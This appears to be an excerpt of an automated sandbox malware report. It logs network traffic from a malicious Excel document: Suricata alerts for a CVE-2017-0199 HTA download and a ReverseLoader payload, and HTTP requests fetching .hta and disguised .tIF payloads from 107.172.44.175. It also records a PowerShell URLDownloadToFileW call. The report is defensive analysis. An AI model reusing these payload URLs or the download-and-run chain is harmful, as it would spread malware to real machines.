Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 107.172.44.175:80
Source: global traffic	TCP traffic: 107.172.44.175:80 -> 192.168.2.22:49166

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.172.44.175:80 -> 192.168.2.22:49166
Source: Network traffic	Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 107.172.44.175:80 -> 192.168.2.22:49164
Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 107.172.44.175:80
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 107.172.44.175:80 -> 192.168.2.22:49169
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 107.172.44.175:80 -> 192.168.2.22:49169
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.22:49168

Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1321/CAMRM.txt HTTP/1.1Host: 107.172.44.175Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 193.30.119.205 193.30.119.205
Source: Joe Sandbox View	IP Address: 107.172.44.175 107.172.44.175

Source: Joe Sandbox View	ASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 107.172.44.175:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 107.172.44.175:80

Source: global traffic	HTTP traffic detected: GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8894-Connection: Keep-AliveHost: 107.172.44.175If-Range: "10deaf-627cc9922fce5"
Source: global traffic	HTTP traffic detected: GET /1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive

Source: unknown

HTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175
Source: unknown	TCP traffic detected without corresponding DNS query: 107.172.44.175

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_000007FE899E4B18 URLDownloadToFileW,

5_2_000007FE899E4B18

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2CE26E2F.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wfUP?&action=historical&rubber=shrill&gallon=cloudy&pocketbook=inexpensive&jumpsuit=nice&heel HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ljg.clConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentiretimeforall.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8894-Connection: Keep-AliveHost: 107.172.44.175If-Range: "10deaf-627cc9922fce5"
Source: global traffic	HTTP traffic detected: GET /1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.172.44.175Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1321/CAMRM.txt HTTP/1.1Host: 107.172.44.175Connection: Keep-Alive

Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: ljg.cl
Source: global traffic	DNS traffic detected: DNS query: 3105.filemail.com

Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/
Source: mshta.exe, 00000004.00000003.501201143.000000000036D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503022942.0000000003336000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/1321/nu/seethebestthignswithgreatattitudewhichgivenubestthingsbackwithentireti
Source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/1321/seeth
Source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF
Source: powershell.exe, 00000005.00000002.529441146.000000000030E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIF:
Source: powershell.exe, 00000005.00000002.530318649.00000000037A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.172.44.175/1321/seethebestthingsentiretimewhichgivenbestdesignforyourthings.tIFp
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: mshta.exe, 00000004.00000003.503859852.0000000003839000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.503393585.0000000003836000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.507508195.0000000003839000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
